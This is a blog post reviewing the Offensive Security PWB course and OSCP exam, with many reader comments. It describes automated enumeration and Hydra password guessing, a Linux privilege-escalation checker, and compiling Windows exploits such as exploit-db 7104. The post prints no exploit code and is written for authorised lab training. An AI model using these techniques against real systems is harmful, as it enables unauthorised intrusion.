Offensive Security’s PWB and OSCP — My Experience

Written on:October 9, 2013
Comments are closed



Recently I took the Offensive Security Penetration Testing with Backtrack (PWB) course, passed the exam, and achieved the OSCP certification.  I learned a ton and earned my most rewarding cert yet.  There are several great reviews of the course but I figured I’d provide my perspective. 


In my current job I’m lucky enough to touch on all aspects of information security from policy and process development to application security testing. The latter (which is where I spend the majority of my time) requires that I keep my technical skills sharp.  I’m a big believer in training that takes a hands-on approach.  I’ve attended SANS training before but I had recently heard many good things about Offensive Security. The pricing of the courses made it an easy sell and the 90+ days of available lab time (you can extend it if desired) meant it would not be another cram-session course.  After reading several online reviews I decided this would be the next professional development course for me.

Course Registration

You can register for 30, 60, or 90 days of lab time — I chose 90. I registered in mid-June of this year and the timing was less than ideal as my wife was approaching her third trimester of pregnancy — meaning my anticipated exam time would be about two weeks before the baby was due. Definitely not the best for my stress levels but I knew that if I didn’t squeeze it in now, I might not have a chance to get it done for a while. Registration requires the use of a non-free email address (no gmail, yahoo, etc). Once you’ve applied for registration, you’ll receive an email with some basic instructions and a link to continue the registration process. If you proceed, you’ll receive a lab connectivity guide and software to test the VPN connectivity. They ask you do this before you submit any payment to ensure you will have no problems accessing the lab environment. Once you’ve successfully tested your connection you can submit your payment. On the first day of your scheduled course, you’ll receive an email with some more instructions as well as the course materials (pdf course guide and videos).  You can visit the FAQ page which contains additional information about the registration process here:

Course Prerequisites 

The prerequisites for PWB as cited by Offsec are “a solid understanding of TCP/IP, networking and reasonable Linux skills”.  With that knowledge you should have no problem getting through the course but I do have some additional recommendations for prospective students to ensure you get the most out of your course time: 

You should be comfortable with scripting. 

I use scripting regularly in my day-to-day work and it proved very valuable during the course. You’ll find yourself repeating enumeration steps over and over and automating tasks via scripting saves so much time.  What language you choose is pretty much up to you but the majority of exploits you’ll run across will probably be written in either Python or Perl.  The course does cover bash scripting but it can’t hurt to familiarize yourself with it ahead of time if it’s not one of your strong suits.

You should be comfortable with Linux and Windows command line syntax. 

This wasn’t an issue for me, but if necessary, take some time to ensure you can navigate the CL in both OS’s. There’s a lot of material covered in the PWB course so you don’t want to be struggling with the basics at the same time.

You should be familiar with Assembly and a debugger

Since buffer overflows are just one of the many topics you’ll cover in the course this might be the least important of the recommendations but I think if you have some knowledge of Assembly and using a debugger you’ll be ahead of the game.  If you want to take a free crash course on Assembly check out  I recommend the Assembly Language Megaprimer for Linux, the Windows Assembly Language Megaprimer, and the Buffer Overflow Exploitation Megaprimer for Linux.  If you watch and comprehend these video series, you should have no problem tackling the basic buffer overflow exploits presented in the PWB course.

Get your “attacking” machine up and running. 

The course recommends the last version of Backtrack but I used the newest version of Kali with no problems.  The directory structure is organized a bit differently so you’ll have to adapt accordingly when following along with the video lessons but it’s no big deal. I personally prefer virtualization so I used a Macbook Pro running a Kali VM on VirtualBox. I would recommend updating the VM before you start the course and once you have everything working, don’t touch it again until after you’ve completed the exam. You don’t want a failed software update or misconfiguration to derail your progress.

Devise an organized note-taking and backup approach. 

Clear, thorough, and organized notes are a key to success. You’re going to cover a lot of material in a relatively short amount of time and when it comes time for the exam, you’ll be glad you kept yourself organized. I used KeepNote to organize all of my notes. It’s cross-platform (Windows, Mac, Linux), comes pre-installed on Kali and is very flexible. 

As I went through the course, I took notes and organized them accordingly.


When it came time to tackle the lab systems, I used a similar approach, tracking the enumeration and exploit activities for each machine, in detail. This proved valuable when it came time to write the report.


To ensure my notes were constantly backed up, I synced my KeepNote files with Dropbox (via a auto-sync folder on my host OS). This is also where I kept my PWB lab/exam report and backup copies of my screenshots. This way, I could access them from any machine and ensure I always had the most current copies. I also took regular snapshots of my Kali VM.

The Course

I would say there are really three components to the PWB course — the “scripted” course, the lab environment, and the exam. The course materials are fantastic – a 300+ page PDF Lab Guide with hours of accompanying videos. The idea is go to chapter by chapter watching the videos, reading the course guide and performing the related exercises. You’ll cover everything from service enumeration to buffer overflows, to password and Web Application attacks. You’ll learn some pretty cool file transfer, port redirection, and tunneling methods. You’ll be able to try your hand at almost all of the attacks in the lab with the exception of ARP spoofing for obvious reasons. If you want to see all of the topics covered in the course, check out the syllabus here.

You’ll also be given access to a Windows VM on which you can compile and test exploits before attempting them on the lab targets. In addition, you’re provided access to an online forum as well as IRC chat where you can usually find an Offsec admin online. I’ve read some course reviews by past students that used the forum/chat quite a bit and others not at all. I personally only used IRC once and that was when one of the machines was misconfigured and had to be fixed by an admin. Even though I didn’t use them a lot, I thought they were great resources to have available. Just don’t expect to get any answers or freebies.  From what I’ve read you might get a hint or more likely you might get the Offsec motto: “Try harder!”. Besides, it’s much more rewarding to figure out a really tough exploit on your own and it’s the best way to learn.  

I’m glad I registered for 90 days of lab time.  As I went through each chapter, I found myself researching a lot of related topics and taking the time to test my own ideas.  It was nice not having to worry about running out of time.  There were some topics, such as Web Application attacks, that I was more comfortable with, so I spent considerably less time on these chapters. This afforded me even more time to research areas that I haven’t had as much exposure to, such as port redirection and tunneling. That’s the beauty of this course – it doesn’t spoon feed you everything or force you to spend equal amounts of time on each topic.  It presents the basics and encourages you to learn about each topic on your own. In many respects what you get out of the course is relative to how much effort you put in.  In all, I spend about 30 days on the scripted course material.

A word about course documentation…

You will be required to submit a final report at the completion of the course (following your exam). This lab report will ultimately contain your completed course exercises, your lab work and your exam results. I can’t stress enough the importance of documenting your progress as you go.  Offsec provides you with a report template but don’t put it off until the last minute!  I’ve read some PWB course reviews from students that have had reports in excess of 500 pages – mine was about 260. 

If you don’t happen to perform penetration testing professionally, you’ll realize that Offsec is trying to impress upon you the importance of thorough and clear documentation.  Just remember that in addition to serving as proof of course completion, the assessment report should be able to walk the reader through the exploit and replicate it. Take notes, take screenshots and stay organized!  This is especially true for the lab and the exam.

The Lab Environment

You are given access to about 50 disparate systems (varying OS’s, service packs/kernels, 3rd party software, etc), each with its own remote and local vulnerabilities waiting to be discovered. These systems span multiple networks, several of which are only accessible via exploitation and the various port redirection/tunneling techniques covered in the course. You should make an effort to access all networks, including Admin, and exploit as many systems as possible. 

The course material introduces you to many of the enumeration and exploit methods you’ll need to exploit these systems and the lab is your chance to put that knowledge into practice (and continue to learn much more!).

Some systems you might exploit relatively easily while others (with names like Pain and Sufference) will put you to the test. My advice is to avoid Metasploit as much as possible. If you exploit a system with Metasploit, see if you can find the same exploit on and try again. You’ll learn so much more and it will help you when it comes time for the exam.  Familiarize yourself with Exploit Database and SecurityFocus as they’ll be invaluable resources for finding relevant exploits. 

I recommend reverting (rebooting) each lab system before you try to exploit it. Remember that you’re in a lab environment with other students making changes to the same systems. There were a couple of instances when I forgot to revert a system and thought I had discovered an exploit only to find out it was put there by someone else. There will be times when you’re working on a system and someone else reverts it. While it is frustrating, it’s a fairly rare occurrence because there are so many systems across multiple lab networks and you’re limited in the number of available reverts per day (so use them sparingly!).  

Another piece of advice is to enumerate, enumerate and then enumerate some more! This goes for both pre- and post-exploit.  Once you’ve got root on a system, don’t just move to the next one. Remember, the lab is intended to mimic an organization’s network environment and you may find files or information on one system that will help you exploit others.  

I’ve said it already, but make sure you keep good notes for each system you exploit — document open ports/services, networking data, OS/service packs, detail your exploits step-by-step and record any goodies you find (password hashes, etc). Be sure to take screenshots as you go. I kept all of this information organized within KeepNote and then transferred it to the formatted lab report periodically. I recommend updating your lab report after every couple of systems you exploit so you don’t end up with a massive reporting task at the end.  

Different aspects of the lab will be challenging depending on your knowledge and experience.  For me, many of the web-based vulnerabilities came relatively easy but some of the Linux privilege escalation exploits were challenging (and that much more fun!).  I took the time to script the Linux privilege escalation enumeration step and learned a lot in the process (a bit more on that later).  

During the lab time, I probably invested about 4-5 hours a day during the week and 6 hours a day on the weekends. In addition to a full time job and a wife in the last trimester of pregnancy I can tell you I had a lot on my plate. I’ll also say that it was well worth it. You can certainly get by with less time but again, I took the opportunity to learn everything I could about each topic and delve into other related topics along the way. By about day 75 I had gained access to all networks (including Admin) and got root/SYSTEM on 42 systems (including most of the tougher ones such as Pain, Ghost, and Niky) with limited shell access to several more. I still had a couple of weeks remaining in the lab but I decided to take that time to prepare for the exam.

Exam Preparation

Exam prep really starts from day one of the course but I took the last two weeks of my lab time to pull everything together and thoroughly test my scripts and exploits.  Here’s some recommendations:

Script your enumeration

You’ll likely develop several custom scripts and use a variety of tools when enumerating in the lab.  I chose to tie all of these together into one comprehensive script that could be launched against one or many targets.  Here a basic overview of what my script did:

  • TCP/UDP nmap scans to identify open ports/services for additional enumeration (see below)
  • DNS enumeration (via dig)
  • HTTP/S enumeration (via additional nmap scans and web file/directory brute forcing)
  • MS-SQL enumeration (via nmap)
  • SSH enumeration (account guessing via Hydra)
  • SNMP enumeration (via nmap and onesixtyone)
  • SMTP enumeration (via nmap and custom account guessing scripts)
  • SMB enumeration (via samrdump)
  • FTP enumeration (via nmap and hydra)

Of course you’re only limited by your imagination and scripting skills so I’m sure there are plenty of additional enumeration steps that you might think of automating. For me, the key was identifying the minimum tasks I wanted to perform while considering time and exam limitations (you won’t be able to use automated vulnerability scanners such as Nexpose, Nessus, etc). As a result I made sure to craft the script to only run the applicable enumeration scripts (based on running services) and omitted automated vulnerability tools.  Having a single script that orchestrates and formats the output for all of these various scans saved me a ton time. When it came time for my exam this proved especially useful because the exam guide gave specific instructions for one of the target systems and while I was working on that system I launched my enumeration script against the rest of the target IPs.  By the time I had gotten root on my first exam system, enumeration had completed for the rest.  

Per request, I’m providing my enumeration scripts below.  Please note that these scripts come as-is with no promise of accuracy and no intent to update.  

Recon Scan
Version: 1.0
8.9 KiB
Script your privilege escalation checks

Linux privilege escalation can be a complicated task as there are so many possible vectors. Running commands one-by-one is tedious and time-consuming, especially when you have to repeat it across many systems. Again, this was another prime opportunity to leverage the power of automation.

Here’s an overview of what my Linux privilege escalation script identified:

  • Basic system info (OS/Kernel/System name, etc)
  • Networking Info (ifconfig, route, netstat, etc)
  • Miscellaneous filesystem info (mount, fstab, cron jobs, etc)
  • User info (current user, all users, super users, command history, etc)
  • File and Directory permissions (world-writeable files/dirs, suid files, root home directory)
  • Files containing plaintext passwords 
  • Interesting files, processes and applications (all processes and packages, all processes run by root and the associated packages, sudo version, apache config file, etc)
  • All installed languages and tools (gcc, perl, python, nmap, netcat, wget, ftp, etc)
  • All relevant privilege escalation exploits (using a comprehensive dictionary of exploits with applicable kernel versions, software packages/processes, etc)

I wrote it in python and uploaded it to each Linux system I compromised to automate all of my enumeration actions and if necessary, privilege escalation exploit discovery.  Per request, I’ve included a copy of the script for download below. Note that this script come as-is with no promise of accuracy and no intent to update.  

Version: 1.0
24.7 KiB

There are several other Linux and Windows privilege escalation scripts freely available and I did try a few, but writing my own allowed me to easily customize the checks I wanted to perform and taught me a great deal more. If you want to get some ideas for additional privilege escalation check out these resources:

Organize and pre-compile your exploits

I kept all of my exploits organized in a customized file structure on my Kali machine but taking the extra steps of pre-compiling and testing the Windows-based exploits really saved me time.  I made it a point to modify, compile, and test every remote and local Windows non-Metasploit exploit I could find.  I organized my compiled exploits and made a very basic chart with the exploit name, MSXX-XXXX number, Exploit-db number, and applicable Windows OS versions. 


During the exam if I came across a situation that required a remote or local Windows exploit, I could simply reference my chart and test the pre-compiled exploit.

Per request, I’ve uploaded an unformatted csv example below. Please note these only represent the exploits that I was able to compile and confirm. I make no guarantees regarding its accuracy or completeness.

MS Privesc And Exploits Table
1.8 KiB

The Exam

I registered for the exam about two weeks before my lab time ended. At your allotted exam start time (I chose 10 am on a Friday) you’ll receive the VPN connectivity pack and exam guide that provides instructions, identifies your target machines, and outlines any restrictions. As many other PWB review sites have stated, there are limitations on the use of Metasploit as well as automated vulnerability scanners such as Nexpose or Nessus so once again, don’t depend too heavily on these during your lab time! Don’t worry, you’ll get very specific instructions on what is and is not allowed when you receive your exam guide. You are allotted 24 hours for the exam, with an additional 24 hours to complete and submit your lab/exam report. Each of the target machines is assigned a point value and you need a minimum number of points to pass the exam. I’m not sure if these ever vary, but in my case I needed 70 out of 100 points to pass. In all, it took me 8 hours (with breaks) to accumulate enough points to pass the exam. I still had one more system that I had not exploited but I chose instead to finish and submit my report (which took about another 2 hours).  Though I was tempted to use the remaining 16 hours to get that last system, given that my wife was 9+ months pregnant, I wanted to avoid any scenario that involved me not finishing and submitting my report before she went into labor!  With the report submitted, I slept soundly that night and received confirmation of its receipt the following morning.  I received notification that I passed the exam and achieved the OSCP certification that Tuesday. 

As far as recommendations for the exam, remember to get plenty of rest the night before and take frequent breaks. I took one after every system I completed with a longer dinner break once I had accumulated enough points and before I completed my report. Try and focus on one system at a time but don’t get bogged down. If you get really stuck, move on to another system. Again, organizing my notes/scripts, automating the enumeration and pre-compiling the Windows exploits allowed me to really focus on relevant exploits without wasting too much time. 


This was the most fun and challenging course I’ve ever taken.  It’s also the most satisfying because although the course material is excellent, much of what you accomplish is due to your own hard work and commitment to Try Harder! I learned a lot and I can’t recommend it enough for anyone that wants to wants to get access to a quality lab environment and hone their pen-testing skills. Since exploit development is one of my areas of interest, I definitely plan on taking the Cracking the Perimeter course as well as the Advanced Web Attacks course (once it’s offered online).  

283 Comments add one

  1. Jason says:

    Thanks for the awesome review. I’m going through the course as we speak. I’m at a wall right now with getting any new machines owned. Do you think I could take a look at your scripts you used for enumeration? Would be really awesome.

    • Mike Czumak says:

      Absolutely Jason, I’ve updated to post to include my scripts. Just note that these were written for my personal use with no intention for portability so updates to environmental variables (file paths, etc) will be necessary and I can’t guarantee their results. The act of writing the scripts proved just as valuable as the scripts themselves so I would encourage you to review their functionality and then go through the same exercise if you have the time.

      — Mike

      • Jason says:

        Awesome, thanks! Yea I learned a lot so far and learned about how to write the scripts. I just like to see what others have done and what their method of thinking is when looking at the scripts. Thanks again.

  2. Martin says:

    Great post! I’ll soon be scheduling the exam myself.

    With regards to the recon script, I had tried something similar myself… however, neither my attempt or this runs quick enough on my machine to even consider using it in its entirety in the exam.

    Did you really run this script as-is? If you did then I think I need a few more cores in the aging machine sitting under the desk :).

    • Mike Czumak says:

      Thanks Martin. I did use the script pretty much as-is (commenting out any type of vuln-scanners like nikto since it’s not allowed for the exam). Since I used the python multiprocessor library I didn’t find it to be all that bad in terms of performance since each system is scanned simultaneously…especially with the small number of systems on the exam. I was running it on a VM w/ only 2gb of memory allocated; Mac host w/ 4gb total RAM, i7 processor. That being said, I purposefully run the nmap stuff first in the script to quickly get all of the open ports and running services so I can begin reviewing it as the script continues. The only thing that I found didn’t finish was the password cracking, but by then I had all I needed :). Believe me, it’s definitely not the most efficient and could probably use some serious attention from a better coder, but it served its purpose for me. If it really is running too slow you may decide to do something similar but only with nmap and none of the other service enumeration scripts. All the best on the exam! — Mike

  3. Todd says:

    Did you have any issues with the ftprecon portion? I seem to get tracebacks but I can’t find the culprit. With that said, I’m fairly new to python.

    • Mike Czumak says:

      I didn’t have any issues, but that’s not to say my code isn’t to blame. Since I never planned to distribute it I left out all error handling which is why you’re getting those tracebacks. One possible culprit is the hard-coded read/write locations. I took the quick route and hardcoded the read path to my wordlists as well as the write path to the results (wordlists/userlist, results/%s_ftphydra.txt, etc). If your dir structure is not the same, you’re going to get errors. If you want to post the originating error from the traceback I might be able to assist, though a Google search might also help, especially if you’re new to python.

      – Mike

      • Todd says:


        Thanks for being so willing to help. I see what you’re saying about the hard coding, but I looked through your code and matched my directory structure. I like the way you laid the code out regardless of maybe it not being the best way. It’s a good learning experience for me. I’m using it as a tool in that way. I’ve already owned a lot of the boxes but wanted to rerun some scans with scripting, etc. to look at better ways to do it. Here’s the error. I removed the IP in the paste just because:

        INFO: Performing nmap FTP script scan for XXX.XXX.XX.XXX
        Traceback (most recent call last):
        File “./”, line 14, in
        results = subprocess.check_output(FTPSCAN, shell=True)
        AttributeError: ‘module’ object has no attribute ‘check_output’

        What’s strange is that if I run the ftp script by itself, it completes fine. Thanks again.

        • Mike Czumak says:


          That error looks like an issue with the import statement. Since it’s pointing to a function of the subprocess module, I’m guessing that’s the culprit. I just tested it on my end and had no issues. What’s weird is that none of the other scripts are raising the same exception, yet the all import the same.It’s a long shot, but is it possible you have another module or file in your path or local folder called subprocess that might be causing a conflict? You can see your imports at runtime by running python with the “-v” switch (python -v Another shot in the dark, but you might try and add “from subprocess import *” to your import statements for just the ftpreconscan and see if that changes anything. If neither fix the issue, it still may be an import problem so you could research that further. Otherwise you may just want to run that one on its own. I’m afraid that without seeing it myself I won’t be much more help.

          – Mike

  4. Todd says:

    The main area having trouble with now is a box that has a RAT but I can’t seem to pop. Can’t seem to get a read on the way in. 🙂

  5. Came across your priv checker script on one of the OS lab systems yesterday, and just wanted to say it’s a really useful script! Definitely going into my toolkit.

    Congrats on the OSCP. It sounds like we are in a similar situation, new baby due in four weeks and starting to sweat about taking the exam.

    • Mike Czumak says:

      Thanks for the feedback, glad you found the script useful. Big congrats on your upcoming new addition! I was definitely glad I was able to take the exam just in time. I was sweating it too but everything worked out perfectly in the end. Best of luck with the exam and more importantly with the new baby. — Mike

  6. ezee says:

    wow, thanks for taking the time to post this. I started PWB on the 22nd of DEC, and just finished the 113th video today. whew. I am switching to the PWK courseware on Jan 1st (free upgrade if you purchased after Nov), after which I plan to spend an additional 30 days on the pdf/videos again before moving on to a few months of labs. I will probably spend 6 months as well, I’m in no hurry.

    I’ve read about a 1/2 dozen posts like this today and reddit threads, and this is the most complete and helpful of the bunch.

    Mike can you also post your list shown here so that we may do the same? This is great advice.


    • Mike Czumak says:

      Thanks, I really appreciate the feedback and I’m glad you found it useful. Per your request, I’ve updated the post to include my list of MS exploits in unformatted CSV form. It represents all of the exploits I was able to compile, test, and confirm. Having this reference and the pre-compiled exploits at-the-ready was worth the prep time before the exam. Enjoy the course and best of luck on the exam. – Mike

  7. ezee says:

    Mike, I just can’t thank you enough for this helpful info, and appreciate how you took care to provide helpful info without any spoilers…that’s respectable.

  8. ezee says:

    xposted this blog entry in a related discussion on reddit.

    leaving this here for the google spiders.

  9. gd says:

    Thanks Mike for this interesting review. Especially Your MS exploits csv file. I would like to have more information about one of them (MS08-067 exploit db 7104). Could we exchange on it in private? I have some issues to compile correctly this exploit.
    Thanks for your reply and congratulations for your cert.

    • Mike Czumak says:

      Thanks for the feedback. If you’re trying to compile 7104.c on Kali via wine and you’re getting ‘undefined reference’ errors, make sure you include all of the necessary libraries — lwsock32, lrpcrt4 and lmpr. You can always find out which library is the culprit by searching MSDN for the reference (e.g. “UuidFromString”) and checking which library it belongs to. Alternatively, I just tested on Windows XP using Visual Studio 2010 and it compiled with no errors. I just sent you an email in case this didn’t address your problem. — Mike

  10. gd says:

    Thanks mike.

    See my email.

    I’ll let you know.


  11. Vitor Durans says:

    Thanks for the great review Mike and congrats for your new certification.
    In your opinion, is this a certification for a more experienced professional or guys like me, entering in the infosec field not so long can take the course and be succesful in the exam either?
    Best regards!

    • Mike Czumak says:

      Thanks Vitor. As you probably know, Offsec bills this as their entry-level course/cert with the caveat that “a solid understanding of TCP/IP, networking, and reasonable Linux skills are required” and I think this is pretty accurate. Just make sure you have a grasp on the fundamentals of networking, operating systems, and scripting so you can focus your course time on learning the “security-centric” material. I reference a few resources in the review, but there are plenty of others you can use to prepare. I think the good thing about this course is that if you have little to no experience in security you’re going to learn a lot and even if you are experienced, you can use the time to explore the topics in much greater depth. You might consider looking at the syllabus and if there are areas you are truly in the dark about, you can do a bit of pre-course self-study. That said, the videos and course guide do a great job of introducing and demoing the concepts and then it’s largely up to you to research and practice them until you feel you have a firm grasp. Remember, you can always extend the lab time if needed. Hope this helps. — Mike

      • Vitor Durans says:

        Thanks again Mike. So, I’m looking for a hands-on course, I’ve been working with linux OS in a ISP then I think the TCP/IP, networking and linux I can handle.
        I’ve also searched for other courses like the CEH from EC-COUNCIL, the syllabus from both are not so diferent, but many of the reviews I’ve read about the CEH people say that is a little theoretical and it could be more hands on.
        Nowadays, I’m concerned about the skills a course can give me, and the certification come as a consequence.
        So, do you think this skills can be obteined more from OffSec than EC-COUNCIL?
        Thanks again for the feedback.

        • Mike Czumak says:

          If it’s a hands-on, practical application course you’re looking for I personally would skip the CEH and go with the OSCP. I haven’t taken the CEH exam, but I’ve read some of the material and taken plenty of multiple-choice style exams to know that it probably won’t be what you’re looking for. If you want to get an overview of some pen-testing/security concepts, buy or borrow a CEH exam prep guide and give is a read, but I think the OSCP is better suited for the skills you’re after. You’ve got the right approach regarding skills vs. certification…you can get a lot out of the PWK/OSCP if you’re willing to invest the time and the certification is an added bonus.

  12. Dave says:

    Great review! what can you say about the network secrets txt file?? any advice?


    – Dave

    • Mike Czumak says:

      Thanks Dave. Advice about finding them? Enumeration, enumeration, enumeration! When you’ve popped a box, don’t be too quick to move on without looking around. Obviously there are only a handful of network-secrets.txt files so it’s a matter of rooting the right machines but if you don’t find it on the one you’re on, you may find other interesting data that will net you another owned box.

  13. Rich Baker says:

    Thanks for the great write-up. It’s very useful as I plan to pursue this as well. Also, congratulations on the baby!

  14. Chris says:

    Great review
    I am in the course now, I have a bout 60+ days left on my labs, and zero scripting experience. I have been getting there each night as time permits to try and play, but I wonder if I am in over my head. For a novice, aside from the pdf and videos, are there other resources you might recommend to help prep for the exam ?

    • Mike Czumak says:


      The course covers so much material, it’s difficult for me to provide a blanket list of other resources. I know you said “aside from the pdf and videos”, but you’ll definitely want to methodically review these resources carefully, perform the example exercises a few times, and figure out where your weaknesses lie. That way you can identify which topics you need to consult other resources. It’s no coincidence that the first ~130 pages of the course guide cover the essential tools, enumeration techniques, and scanning. It’s key you have a grasp on these concepts because they will play a major role in both the lab and the exam. The lab is a great playground that sets this course apart from others, but it will serve you well to approach this as if it were a real penetration test. Scan and enumerate, documenting your findings as you go. This is how you’ll organize your plan of attack for each system and find vulnerabilities and clues for others.

      For bash scripting you might want to have a look at the video “Bash Scripting 101 for Pen Testers” ( SecurityTube is a great resource for learning the basics of Assembly, Buffer Overflows, etc. They also have a relevant video from Mark Baggett on proxychains For web application security, there are tons of great free sites out there. If you want a book, I’ve found no other single resource greater than The Web Application Hacker’s Handbook. For Buffer Overflows, I have some tutorials on my site (Windows-centric with more on the way) and Corelan Team’s site is also a fantastic resource. For scripts and cheatsheets (reverse shells, sql injection, etc) check out FuzzySecurity recently posted a thorough tutorial on Windows Privilege Escalation ( Again, this is only a sample of the resources available out there. If you have an area in mind that you’d like to learn more about, let me know and maybe I can suggest others.

      Don’t get discouraged. You can get a lot out of this course if you work through the material slowly and practice applying the concepts in the lab. The hands-on application of the topics will benefit you a great deal.

      I hope this helps. – Mike

  15. Brad says:

    Did they change the timing? I thought you get a full 24 hours to pop the boxes and another full 24 to write the report.

    • Mike Czumak says:

      I didn’t hear that they changed the timing. Are you referring to something in my post or something you heard elsewhere?

  16. Chris says:

    @Brad –
    Here is what they told me on my welcome letter.

    You will have 23 hours, 45 minutes to hack a live lab environment similar to the exercises in the course
    * During the first hours of the challenge, one of our staff members will be online on IRC ( in the #offsec channel) and the Jabber network ( to assist you if problems arise.
    * You need to send your lab and exam report to within 24 hours of the end of the challenge

  17. Chris says:

    @Mike –
    Thank you for the very thorough reply ! Loads of resources in there, I will certainly check out. I check out the videos and pdf as I can during the day at work, then try to apply the labs at home in the evening. So far progress is slow, but with some of your scripts as examples, and the resources you mentioned I may have found some new motivation. Many thanks ! I have never really used the IRC before, is it worth adding a client to talk it up in the offsec channel ?

    • Mike Czumak says:

      You’re welcome. You certainly have nothing to lose by getting on IRC–you may get some useful guidance. Best of luck!

  18. Maxx says:

    Hi can you also upload your userlist offsecpass list? Would be very nice. Thx for this awesome tipps. Kind regards maxx

  19. ad says:

    Hi Mike,

    Thank you for your great review and I do agree that yours is the most comprehensive and helpful compare with others.

    With regard to exploit #7104 from exploitdb, I managed to compile it but it seems that it doesn’t work, the Win32 service on the target machine always crashed after receive the shellcode.

    Do you mind to share your .c and executable files with me via e-mail please?

    Thank you


    • Mike Czumak says:

      Thanks for the feedback! I’ve sent you an email re: 7104 -Mike

      • yassine says:

        please ad or Mike Czumak, i couldn’t manage to compile the 7104.c, if you could share the .exe file with me!!

        • Mike Czumak says:

          Sorry, my compiled version didn’t execute w/o errors (see prior comment). – Mike

  20. Jay says:


    I need your advice on usage of password files. Text files like “rockyou” have an impressive list of potential passwords, but brute-forcing with these large files can take some time. For instance, I was trying to brute-force RDP with ncrack and the rockyou text file, and it seemed to take forever.

    From your experience, are we expected to use these large files for brute-forcing in the PWB/PWK course and exam? I am asking from a time-constraints perspective.


    • Mike Czumak says:

      The short answer is no, I would not necessarily default to a large file such as “rockyou” for every password guessing attempt. At the same time, it’s all about using your time wisely so if you identify an exposed service that you want to try a password guessing attack, you might try a larger list and while that’s running, focus your attention on another system or service. It partially depends on the service you are targeting — services such as RDP, telnet or others with response delays/timeouts/automatic disconnects can add significant time to the process and you don’t want to go overboard on your password list. For password audits in general (PWK course or otherwise) I recommend tailoring your password list as much as possible — usernames/passwords of already discovered and cracked accounts, keywords pertinent to your environment/users, etc. Start with as small a list as possible and work your way up to a larger list if necessary. For example, for this course I had one list that contained the most common passwords to which I continuously added any newly discovered username and cracked password that I found in the lab. I think you’ll find for the exam that you don’t need to go overboard and you always have the option to move to a larger list. Hope this helps. – Mike

  21. Jay says:

    Many Thanks, Mike

  22. Olivier says:

    Hi Mike,
    Thanks a lot for your feedback. You mentioned that it was not always possible or useful to use vulnerablity scanners (Nessus, OpenVAS, etc.). So how did you select CVEs, exploits, payloads to compromise the targets ? Please could you elaborate a little bit?
    Thanks in advance,

    • Mike Czumak says:


      While vulnerability scanners such as Nessus have practical, time saving application in real-world testing efforts, they are not allowed on the exam and should not be relied upon when performing the lab. The course is designed to ensure you have the skills to identify this same vulnerability information manually and highlights why enumeration and discovery is such a fundamental step in the pen-test process. In terms of how to do it, the lessons on information gathering, recon, and and port scanning are key … use nmap to determine open ports and services or telnet/nc to banner grab; what OS is running? what applications and versions are discovered? are there known exploits in exploit-db for any of these? Through these enumeration techniques you will discover vulnerable services and select your payloads accordingly. Hopefully this answers your question.

      – Mike

  23. fei says:

    Nice review and congratulation. I had subscribed to the latest Penetration with Kali and I have learned so much from the course material (BO, Tunnelling, File transfer and etc). However, things start to change when I move on to the pentest on hosts in the lab segment.

    Pawning the first few hosts with metasploit is relatively easy but that is not the right way (as the exam does not encourage the use of metasploit) and compiling codes from exploitdb/security focus may not be straight forward, especially when it comes to cross platform compilation (compiling windows C in linux environment). It could be discouraging when I only had 4 hours per day to work on the lab (busy working during day time), and yet stuck on getting the exploit from exploitdb/security focus working. I may need to find some hacking buddy from its IRC channel.

    I decided to extend the lab as I could not finish pawning all the hosts in just 30 days.

    The above are based on my knowledge and experience, please do not be discouraged to take on the PWK.

  24. yassine says:

    Mike, Thanks you for this important resource and information that’s helpful for us ad beginner who prepare for this certification .i have just one other request (and i know we ask you so much 🙁 ,thank you again for that ),could you share with us your study note because it’s seem rich of information, even if i’am preparing the pwk version of the course, it will be helpful to me. you have my email 🙂

    • Mike Czumak says:

      Unfortunately nearly all of the notes I have are specific to each system in the lab (specific scripts I used for a given target, the steps I took to get root, goodies I found, etc) and I wouldn’t want to share those. If you have a specific question about a topic, I’d be glad to help though. -Mike

  25. Peter says:

    Hi Mike,
    Great post, I must say.

    I am taking the OSCP course as I type in.
    I am kinda stuck in finding the “right” exploits in exploit-db & securityfocus. The search term doesn’t always return the right exploits you’re looking for.
    Any piece of advice on improving the search capability.


    • Mike Czumak says:

      Thanks Peter. Regarding searching for exploits, you may be better off using Google, especially if you have limited information about a target software/service. You can always narrow your search to sites like exploit-db by using the Google dork.

  26. Peter says:

    Gotcha. Thanks !

  27. Eric says:

    Mike this is an awesome post. Thanks for giving back. I just passed the CEH and now taking this OSCP course. I was trying to get a feel of how the exam was setup or how to approach it. All I do for the company I work for is scan find vulns write a report about how they will affect the system or the environment. We don’t exploit but I do exploit in my lab. So yes I do all the recon and identify security problems with systems…. I do a little scripting with bash and python. I’m good at reading others script then picking it to work as I would like it.. I say all of this to ask you or anybody on the blog is the exam pretty much the way I’ve been explaining how I work? Long as you go through the course and remember how to do things take good notes it should be smooth as the exercises?

    • Mike Czumak says:

      Thanks Eric. Yes, I thought the lab was the perfect prep for the exam. Really the exam is not much different … just fewer machines and the added pressure of a lot less time. If you feel comfortable with the course material and techniques practiced in the lab, take good notes, organize your materials, and develop your plan of attack ahead of time, you should be well prepared for the exam.

  28. Peter says:

    Hi Mike,

    +1 praise for your post. I’ve just finished pwning my way through the labs and will have my exam soon. Your Linux script was very useful, and I’m now adapting your recon scripts to my taste. This is by far the most useful and comprehensive post on OSCP you can find nowadays on the ‘Net.

    I’m also having trouble with exploit-db 7104 (service code exec). It seems to crash Win XP SP3 every time. If you look at the metasploit module for this, there are lots of different cases in there. What did you do to modify it?

    Also, you probably can’t go in detail, but it is worth spending the time compiling the remote exploits? I’ve got all my privilege escalation ones, but I find the remote ones on exploit-db hard to compile, and even when you are able to, they are quite fiddly and only work on certain specific Windows versions.

    BTW, here is the link for the enlightenment exploit pack by spender, which was very useful in the PWK labs to escalate in some Linux machines:

    Thanks and regards!


    • Mike Czumak says:

      Thanks for the feedback Peter, I’m really glad you found the post and scripts useful. Yeah, the remote exploits, including 7104 can definitely be finicky and specific in their targets. In fact, I don’t know that I ended up using 7104 at all, but I was able to successfully compile most others (though I ended up using multiple flavors of Windows to do so). Compiling the privilege escalation scripts were my primary focus as well and certainly proved useful. You may not end up using any, but for me having the remote exploits was good peace-of-mind as I simply didn’t want to have to deal with troubleshooting a compilation error during the limited exam time frame. That being said, you probably shouldn’t get too hung up on the ones that you can’t compile easily.

      It sounds like you’re doing all of the right things to prep for the exam. Best of luck and thanks for sharing the link to the Linux privesc exploit.

      – Mike

  29. itsmario says:

    Hi Mike,

    I was wondering if usage of provided online rainbow cracker for pwk was allowed during the exam or are we expected to crack passwords on our own?

    • Mike Czumak says:

